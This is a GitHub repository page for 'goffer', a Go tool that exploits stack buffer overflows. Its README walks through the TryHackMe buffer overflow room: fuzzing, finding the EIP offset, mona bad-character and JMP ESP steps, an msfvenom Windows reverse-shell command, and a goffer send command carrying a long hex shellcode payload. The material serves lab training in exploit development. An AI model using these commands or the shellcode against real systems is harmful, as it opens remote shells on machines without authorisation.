Skip to content

souvikhaldar/goffer

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

24 Commits
cmd
cmd
 
 
pkg
pkg
 
 
.cobra.yaml
.cobra.yaml
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
allhex.txt
allhex.txt
 
 
go.mod
go.mod
 
 
go.sum
go.sum
 
 
main.go
main.go
 
 

Repository files navigation

Goffer

A powerful tool for hacking insecure servers with buffer overflow vulnerability. Written in go.

Installation

  1. Install Go.
  2. go get github.com/souvikhaldar/goffer

Steps for tryhackme buffer overflow prepation room:

Youtube link for below steps

  1. Set working directory in immunity: !mona config -set workingfolder c:\mona\%p
  2. Fuzz: goffer fuzz -i 10.10.130.130 -p 1337 -c "OVERFLOW1 "
  3. Find EIP address: goffer offset -i 10.10.130.130 -l 2100 -p 1337 -c "OVERFLOW1 "
  4. Generate bytearray to find bad chars: !mona bytearray -b "\x00"
  5. Compare this generated bytearray with contents of your stack: Eg. !mona compare -f c:\mona\vulnserver\bytearray.bin -a 00C0F9C8
  6. Check which modules have all security turned off: !mona modules
  7. Find address of JMP ESP instruction in module xyz which doesn't have badchar 00 in immunity debugger: !mona jmp -r esp -cpb "\x00" -m xyz
  8. Set a breakpoint at the above instruction's address and put this address (in reverse) in the EIP to check if we can reach this point.
  9. Now put the shellcode in the stack (starting at ESP) and prepended with NOPs. You can use the following msfvenom command to create a reverse shell shellcode for windows: msfvenom -p windows/shell_reverse_tcp LHOST=10.9.3.249 LPORT=4444 EXITFUNC=thread -b "\x00\x07\x08\x2e\x2f\xa0\xa1" -f hex
    then use the following goffer command to set this shellcode into the stack and place the JMP ESP instruction's address in the EIP (eg.): goffer send -i 10.10.101.55 -p 1337 -c "OVERFLOW1 " -a 1978 --eip af115062 --esp 90909090909090909090909090dadcd97424f45ab811464c5131c9b15283eafc314213035355aea4afb1ac474f42d1ceaa73d1b5bf24e1beedc88a93055afe3b2aebb51d05ece65e046ef5b2e64f36c7e7882b2ab541279929e57d22c2b59022370d9203e605cd8309c9658a110e4344aae43f577a35bff443f93204843ead73fc3c50843b3e8e01df9845b13b188924c8166622963a79e7ad47f20661ce402da58a134cfc76f5711ed9aad755f4bf6534910c44c6611bdfb553844b51d84d52a61f642238de87531125d303098c5cc8c931895f999d6220495ed3c883510ce8acbb2583572c405d54553c5f5ab4e1d6bcdc09bf1749b39ae3e83c318e2bb6b66fe53fb26392cf89d935cf2775d942ac85947e7bd2f1b172b6efe82ca4ed6d166c2a4e996dbfeabd7d79f2f929d5a55787931f16714af3f0150b3fc363146ab58ba5c380b40a8404cd7634ea043354098c4efd9445f36027b0309da430c95ab431cc2772aabc3817cc133832

Steps for solving vulnserver with goffer

Using Goffer for hacking vulnserver

About

Perform buffer overflow vuln testing and exploit

Resources

Readme

License

Apache-2.0 license
Activity

Stars

4 stars

Watchers

2 watching

Forks

0 forks
Report repository

Releases

1 tags

Packages

No packages published

Languages